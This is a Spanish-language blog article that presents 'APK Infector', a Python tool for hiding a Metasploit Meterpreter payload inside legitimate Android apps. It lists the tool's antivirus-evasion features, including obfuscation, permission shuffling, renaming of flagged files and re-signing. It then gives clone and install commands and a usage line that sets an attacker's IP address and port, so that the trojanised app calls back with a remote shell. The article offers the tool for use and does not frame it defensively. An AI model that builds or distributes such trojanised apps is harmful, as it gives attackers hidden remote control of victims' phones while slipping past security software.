APK Infector Incrustar APK Meterpreter en APK Legítimo
APK Infector Incrustar APK Meterpreter en APK Legítimo

APK Infector: Incrustar APK de Meterpreter a cualquier APK Legítimo

Herramienta avanzada de evasión antivirus para Android escrita en Python 3 que puede incrustar/vincular el APK de meterpreter a cualquier APK legítimo y puede ofuscar completamente la carga útil de meterpreter con diferentes técnicas.

Aprende con EsGeeks

APK de Android es un formato de archivo que se utiliza para distribuir e instalar aplicaciones móviles en el sistema operativo Android de Google. Un archivo de paquete de Android (Android PacKage) contiene la colección de archivos que definen colectivamente una aplicación de Android. Esto incluye cosas como el código ejecutable, los recursos y los activos (como imágenes).

En este artículo, vamos a presentar una herramienta avanzada que se puede utilizar para infectar aplicaciones de Android (APK) con una carga útil meterpreter de Metasploit.

Características

  • Automatizar completamente la creación de cargas útiles (Payload) con MSFvenom
  • Crea un archivo handler.rc
  • Indetectable
  • Ofusca el Meterpreter APK
  • Une/incorpora Meterpreter APK con cualquier APK legítimo
  • Genera automáticamente una clave que se utiliza en la firma
  • Capaz de firmar el APK usando Jarsigner o APKsigner
  • Zipalign el APK firmado
  • Baraja los permisos del APK de Meterpreter para la evasión de AV
  • Cambia el nombre de la carpeta por defecto y los nombres de los archivos que están siendo marcados por AV

Visión general de las herramientas

Vista principal de apkinfector
Vista principal de apkinfector
Demostración apkinfector
Demostración apkinfector

Requisitos

  • Python 3.X
  • APKsigner o Jarsigner
  • APK Tool [Última]
  • ZipAlign

Probado en: Kali. Kali Linux – 2019.4

Instalación y uso

  • Navega hasta el directorio /opt (opcional)
cd /opt/
  • Clona este repositorio
git clone https://github.com/PushpenderIndia/apkinfector.git
  • Navega a la carpeta cd apkinfector:
cd apkinfector
  • Instalar las dependencias
apt-get update && apt-get install apktool && apt-get install zipalign && apt-get install apksigner
  • Ejecuta la herramienta por primera vez
python3 infector.py --help
  • Ejemplo de uso
python3 infector.py --lhost 192.168.43.70 --lport 4444 --apk-name NEW_APK_NAME --normal-apk /root/Desktop/Path/TO/Legitemate_APK_File.apk

Argumentos disponibles

Argumentos opcionales

Comando CortoComando LargoDescripción
-h–helpmostrar este mensaje de ayuda

Argumentos requeridos

Comando CortoComando LargoDescripción
–lhost 192.168.44.33Dirección IP del atacante
–lport 4444Puerto del atacante
-n NORMAL_APK–normal-apk NORMAL_APKRuta Absoluta del Archivo APK Legítimo
–apk-name APKNAMENombre del APK (Cualquier cosa que quieras nombrar)
Dark Mode

apkinfector (este enlace se abre en una nueva ventana) por PushpenderIndia (este enlace se abre en una nueva ventana)

Advanced Android AV Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK

Más artículos
FinalRecon Herramienta OSINT para Sitios Web
FinalRecon: Herramienta OSINT todo en uno para Web